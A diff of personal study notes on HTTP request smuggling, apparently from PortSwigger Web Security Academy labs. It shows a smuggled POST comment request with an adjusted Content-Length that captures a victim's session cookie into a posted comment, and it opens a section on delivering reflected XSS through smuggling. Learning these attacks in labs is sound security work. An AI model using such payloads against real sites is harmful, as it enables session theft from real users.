astaniano/hat/webSecAcademy/advanced_topics/httpReqSmuggling/httpReqSmuggling.md

 POST /post/comment HTTP/1.1
 Host: 0a0200e004ff76a4802d80e700f80003.web-security-academy.net
 Content-Type: application/x-www-form-urlencoded
-Content-Length: 770
+Content-Length: 803
 Cookie: session=nAkpyucPUGofhOyEDpeS71aJYlgMWsgC

 csrf=ZFnFy70zJnQ6p2QNAKAUMkqEEBIDsQ8L&postId=6&name=ff&email=ff%40ff.com&website=http%3A%2F%2Fff.com&comment=
 ```

-Once a victim makes a req, their cookie is posted in a new comment
+Once a victim makes a req, their cookie is posted in a new comment. (the victim makes a req after we make 2-3 requests)

 ### Using HTTP request smuggling to exploit reflected XSS
 If an application is vulnerable to HTTP request smuggling and also contains reflected XSS, you can use a request smuggling attack to hit other users of the application.
 This approach is superior to normal exploitation of reflected XSS in two ways: